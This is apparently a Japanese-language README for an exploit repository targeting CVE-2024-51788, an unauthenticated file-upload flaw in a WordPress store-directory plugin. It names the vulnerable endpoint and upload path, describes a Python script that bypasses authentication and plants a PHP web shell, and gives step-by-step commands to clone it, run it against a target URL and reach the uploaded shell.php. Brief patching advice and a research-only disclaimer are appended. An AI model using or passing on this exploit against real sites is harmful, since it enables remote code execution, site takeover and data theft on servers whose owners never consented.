
CVE-2024-51788 - WordPress The Novel Design Store Directory plugin <= 4.3.0 - 認証不要の任意ファイルアップロード脆弱性
CVE-2024-51788 は、The Novel Design Store Directory WordPress プラグイン (<= v4.3.0) に影響を与える新たに公開された 重大 な脆弱性です。この欠陥により、認証されていない攻撃者 が 悪意のあるウェブシェル を含む任意のファイルをアップロードでき、影響を受けるサーバー上で リモートコード実行 (RCE) が可能になります。
🔴 深刻度: 10.0 / 10 (Critical)
📅 公開日: 2024年11月11日
📅 更新日: 2024年11月12日
🔗 CWE ID: CWE-434 - Unrestricted File Upload
✅ サーバー全体の侵害 - 攻撃者はウェブサイトを完全に制御し、任意のコマンドを実行できます。
✅ データ漏洩 - 機密情報へのアクセスと改ざん。
✅ ウェブサイトの改ざんとマルウェア注入 - 攻撃者はウェブサイトのコンテンツを変更したり、マルウェアを仕掛けたりできます。
✅ 権限昇格 - 攻撃者はこれを悪用して権限を昇格させ、ネットワーク内で横移動する可能性があります。
この脆弱性は、wp-admin/options-general.php?page=licence エンドポイントにおけるアップロードファイルの不適切な検証に起因します。攻撃者は認証なしで悪意のあるPHPスクリプトを /wp-content/plugins/noveldesign-store-directory/images/ ディレクトリにアップロードでき、最終的にリモートコード実行 (RCE) につながります。
🚨 攻撃を可能にする主な要因:
Pythonベースのエクスプロイトスクリプトが開発され、エクスプロイトプロセスを自動化しています。このスクリプトは:
✅ 認証をバイパス - ランダムなユーザーエージェントとCookieを使用。
✅ 悪意のあるPHPシェルをアップロード - サーバーに直接。
✅ 任意のコマンドを実行 - 侵害されたマシン上で。
✅ ターゲットが脆弱かどうかを自動検出。
📌 エクスプロイトの使用方法:
usage: CVE-2024-51788.py [-h] -u URL
Exploit script for CVE-2024-51788 # by Nxploit Khaled Alenazi.
options:
-h, --help show this help message and exit
-u, --url URL Target URL
🔍 成功すると、シェルは次の場所にアップロードされます:
/wp-content/plugins/noveldesign-store-directory/images/
1️⃣ リポジトリをクローン:
git clone https://github.com/Nxploit/CVE-2024-51788.git
cd CVE-2024-51788
2️⃣ エクスプロイトスクリプトを実行:
python3 CVE-2024-51788.py -u http://target-wordpress-site.com
3️⃣ アップロードされたシェルにアクセス:
http://target-wordpress-site.com/wp-content/plugins/noveldesign-store-directory/images/shell.php
pip install requests argparse urllib3
🔹 The Novel Design Store Directory プラグインを最新バージョンに更新 する。
🔹 ファイルアップロード権限を制限 し、安全なファイルタイプのみを許可する。
⚠️ このエクスプロイトは教育および研究目的のみです。 適切な許可なくシステムに対してこのエクスプロイトを不正に使用することは違法です。著者はこの情報の誤用について一切の責任を負いません。
📌 作成者: Nxploit | Khaled Alenazi | 🔥 さらにセキュリティ研究とエクスプロイトをフォロー!